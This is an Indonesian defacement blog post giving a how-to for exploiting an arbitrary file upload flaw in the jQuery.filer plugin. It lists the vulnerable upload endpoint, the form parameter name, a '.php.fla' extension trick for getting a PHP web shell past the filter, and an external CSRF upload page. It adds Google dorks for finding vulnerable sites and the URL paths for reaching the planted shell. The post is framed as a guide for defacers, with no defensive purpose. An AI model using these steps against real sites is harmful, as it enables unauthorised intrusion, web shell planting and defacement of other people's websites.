back lg nih bersama gue , admin trolling system :D
kali ini gue share Deface jQuery.filer Arbitrary File Upload , cara ini sama seperti cara jQuery file upload
Exploit: /jquery.filer/php/upload.php
Input param name file: files
Ext Shell: .php.fla
CSRF: http://rafterday.net/csrf.php
Dork: inurl:/jquery.filer/php/
inurl:/jquery.filer intitle:index of
Seperti biasa kalian dorking dulu di google atau di bing , dimana aja bisa
Ciri ciri vuln, website blank
Selanjutnya upload shell ext php.fla , dengan input param name file nya yaitu files
Akses shellnya: site.com/[path]/jquery.filer/uploads/shell.php.fla atau site.com/[path]/jquery.filer/uploads/shellmu.p.php.fla
dan taraa, shell berhasil di upload
Terima kasih sudah berkunjung :D
Contact admin http://rafterday.net